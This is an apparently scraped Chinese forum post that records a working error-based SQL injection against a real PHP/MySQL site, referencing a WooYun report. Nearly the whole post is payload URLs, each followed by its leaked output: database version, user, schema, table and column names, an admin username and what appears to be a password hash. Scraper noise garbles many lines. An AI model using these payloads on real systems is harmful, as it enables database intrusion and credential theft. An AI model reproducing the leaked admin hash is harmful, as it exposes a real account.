找回密码
 立即注册
查看: 2567|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666
% g+ H; z* ?! {& D! V- {' ~" p$ W% ?. e5 k3 X9 O, d4 p2 O& |, }
之前想找个测试 没想到这有 可以测试下做个记录而已
& r- {: m; ?  [& Y: c
9 m4 I+ l" {+ L3 P- _( M9 T( \http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_0035 W+ Q5 i) X( v) y
( z. j' x$ ?5 g' G" }2 N
/data0/htdocs/leqi_new/app/myapp.php
6 Z. P& ?9 l: a8 t4 y% ?5 Y4 ^8 ^# l! x4 u3 I" i0 S& [
或者
8 s4 G$ ^3 t" ^2 Z
3 t* ]$ c) s# X7 \3 L3 s7 s7 m/**********version()**********/ 5.1.49-log5 W+ W+ `+ F7 K
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
& P* I; z! I( ]+ Y% B* l7 q6 b( \0 d, l  p
/**********user()**********/  7 z+ `+ d) @* E, y9 D' c
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003. Q/ {2 L  R; }9 n; p- T7 a

' h; Q# I' J/ H3 O* ?6 q/**********database()**********/  leqi6 j4 `8 y: [& H9 w( ]
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003& @* D1 F+ Y! D$ d* l( c

- W1 u3 J: R0 [4 ~/**********limit依次递归爆库**********/
3 x: q2 u7 e' xhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
7 P% @  f3 m5 z1 C5 a* M  Einformation_schema
, |$ g: X% e8 r) l; I, Ohttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
) P* Z' i$ A# F! v: A; f$ _leqi0 q5 C8 v1 R0 a
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. \8 b2 N# k" \1 c! l( d$ k* [0 D9 K7 I2 Vtest* t3 d5 G; {) i/ A2 |+ a- p: e

8 M% t8 ]- Q- Y! R6 g. o. P/**********limit依次递归爆表名**********/: k: w' I. k& k  t1 Q8 `- T8 a4 E
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0038 O# U$ f! f% s  P) }- [
users
- x  _% R% y# x' O4 d8 Q, x% v: `- |: j1 Q
/**********limit依次递归爆字段名**********/
) h! f8 R9 L4 u1 J3 }: |* ^( Chttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003! |4 r# S- H' Y. c
user_id,username,nickname,passwd,group_id
. {, X  l! a5 a! C7 ]9 [; Ohttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%236 L& S, }) K5 C% z# B6 }2 r( i
/wapc/5000_0005_0035 ^9 _( O2 i9 s6 u$ m/ K
11 21
( d. L8 P+ D0 [http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
! ~' v% a2 Z; P6 X0 W& x: _% D' w/wapc/5000_0005_003; h" W# |+ G; U
11 341 351 361$ h. z2 T6 \. q& b$ Y* m4 D
/**********爆数据**********/
% X( M/ H' I1 U( Whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
& C0 V. ]4 ~9 A7 @( R7 }6 Q3 J! L8 Dadmin  m9 P+ X: _4 J0 z4 O
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%235 }7 {7 ?( ^3 s! m, k
6a8b4574ca231eb8bd52764d4978ffcd
; j* ^1 \& \! ]. D; R  n/ `, F7 Y$ w: \: m/ Y5 r

4 H& y6 c( ]" V7 ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表